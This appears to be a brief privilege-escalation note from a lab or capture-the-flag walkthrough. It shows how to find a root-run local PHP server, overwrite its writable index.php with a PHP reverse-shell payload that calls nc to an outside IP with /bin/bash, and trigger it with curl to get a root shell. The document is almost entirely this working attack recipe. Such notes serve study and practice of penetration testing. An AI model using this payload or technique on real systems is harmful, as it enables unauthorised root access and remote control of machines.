Ctrlk

Priv Esc

ps aux | grep root

/bin/sh -c /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/

PHP web app being hosted locally on port 57 with the root directory of the web app being /var/tmp/sv/

Index.php owned by root writable for us 👍

echo "<?php system('nc 192.168.45.216 1338 -c /bin/bash');?>" > index.php
curl http://127.0.0.1:57/index.php

Last updated 1 year ago